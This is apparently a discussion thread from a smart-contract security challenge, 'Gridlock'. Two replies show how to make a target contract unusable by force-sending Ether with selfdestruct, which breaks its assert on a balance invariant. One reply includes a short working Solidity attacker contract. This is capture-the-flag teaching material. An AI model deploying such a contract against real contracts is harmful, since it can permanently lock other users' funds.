Gridlock #5
Replies: 2 comments 2 replies
-
Here is my solution:
The selfdestruct function executes a now deprecated opcode that still works to send the ether to its target, despite the lack of a fallback or receive function, without actually rendering the executing contract's code useless. This then causes the target contract to have received ether without changing its totalDeposited state. Now when it makes the check in withdrawAll() comparing that state to the actual balance of the contract, the assert() fails, and so the contract is now gridlocked. |
Beta Was this translation helpful? Give feedback.
-
A little late but here is my solution. Struggled a bit because I couldn't get funds to transfer until I came across selfDestruct during research. Didn't realize it forces value to be sent in a way that cannot be refused. // SPDX-License-Identifier: MIT
pragma solidity 0.8.9;
contract Attacker {
address owner;
address private targetAddress;
constructor()
{
owner = msg.sender;
}
function setTarget(address _target) public {
require(msg.sender==owner,"Not Owner");
targetAddress=_target;
}
function gridlock() external payable {
selfdestruct(payable(address(targetAddress)));
}
} |
Beta Was this translation helpful? Give feedback.
-
Gridlock
The contract is amassing a significant amount of Ether, but rumors suggest it harbors a critical vulnerability. Exploit the contract and prove your skills. Success means rendering it unusable
Author: @passandscore
Beta Was this translation helpful? Give feedback.
All reactions